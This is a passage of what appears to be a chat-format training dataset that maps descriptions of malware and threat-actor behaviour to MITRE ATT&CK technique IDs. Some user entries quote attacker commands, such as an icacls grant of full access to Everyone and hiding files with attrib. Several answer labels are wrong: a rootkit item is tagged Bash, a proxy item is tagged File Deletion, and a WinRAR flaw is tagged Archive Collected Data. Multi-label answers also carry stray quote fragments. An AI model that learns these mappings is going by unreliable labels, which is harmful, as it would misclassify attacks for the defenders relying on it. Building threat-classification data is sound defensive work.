- "content": "Dragonfly has moved laterally via RDP."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FakeM contains a keylogger module."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT can modify service configurations."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process"
- },
- {
- "role": "assistant",
- "content": "T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the “CommandLineTemplate.” Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has incorporated dynamic DNS domains in its infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The code then uses the identified functions to add persistency through registry and add next stages file names identifier through the following locations"
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has run \"netstat -anp\" to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify \"/etc/ld.so.preload\"."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has used keylogging tools in their operations."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can persist via startup options for Login items."
- },
- {
- "role": "assistant",
- "content": "T1547.015 - Boot or Logon Autostart Execution: Login Items"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can capture screenshots of the victim’s machines."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence."
- },
- {
- "role": "assistant",
- "content": "T1137 - Office Application Startup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut includes subprojects that enumerate and identify information about Process Injection candidates."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY has used python scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner has used `launchctl` to restart the Launch Agent."
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware KiloAlfa contains keylogging functionality."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We will discuss the Spark backdoor’s functionality in detail later in this blog, but this specific sample has the following configuration"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Screen capture and audio recording SpyNote RAT was able to take screen captures and, using the device’s microphone, listen to audio conversations"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has checked the current date on the victim system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peppy has the ability to automatically exfiltrate files and keylogs."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack’s RAT makes a persistent target file with auto execution on the host start."
- },
- {
- "role": "assistant",
- "content": "T1547 - Boot or Logon Autostart Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Turla JavaScript backdoor has used Google Apps Script as its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type uses Base64 encoding for C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DropBook’s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors used XOR-encrypted payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a new Windows service with the malicious executable for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number."
- },
- {
- "role": "assistant",
- "content": "T1480.001 - Environmental Keying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity has encrypted C2 traffic using SSL/TLS."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 — Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable \"researchers\" initialized to the string \"We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader injects into the Internet Explorer process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete itself or specified files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used open-source JNDI exploit kits to exploit Log4j (CVE-2021-44228) and has exploited ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) on MS Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After dropping these files to its working directory, the malware attempts to change the attributes of all the files to “hidden” and grant full access to all files in the current directory and any directories below. It does this by executing “attrib +h .”, followed by “icacls . /grant Everyone:F /T /C /Q"
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to compress its components."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor starts by collecting basic information about the victim’s machine and calculating a 4-byte long victim identifier, based on the user-name, computer-name and the domain name of the target environment"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\"."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to upload a file to the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover running services and associated processes using the \"tasklist /svc\" command."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Payloads are now hosted on compromised websites. The payloads hosted on these websites consist of seemingly benign BMP image files. The malicious macros download the images and the ObliqueRAT payload is extracted to disk. The ObliqueRAT payload is renamed with the .pif file extension"
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, the malware checks for the existence of a Mutex value, “EKANS”, on the victim. If present, the ransomware will stop with a message “already encrypted. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer utilizes PsExec to help propagate itself across a network."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has executed the \"reg query\" command for \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used automated collection."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used \"CreateProcessW\" to create child processes."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts data sent to its C2 server over HTTP with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack malware is a remote access Trojan written in C++ that relies on a proxy communication tool to relay data from the infected host to a command and control IP"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services"
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys', 'T1550 - Use Alternate Authentication Material"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Out1 can use HTTP and HTTPS in communications with remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.”"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of file deletion along with other file system interaction."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
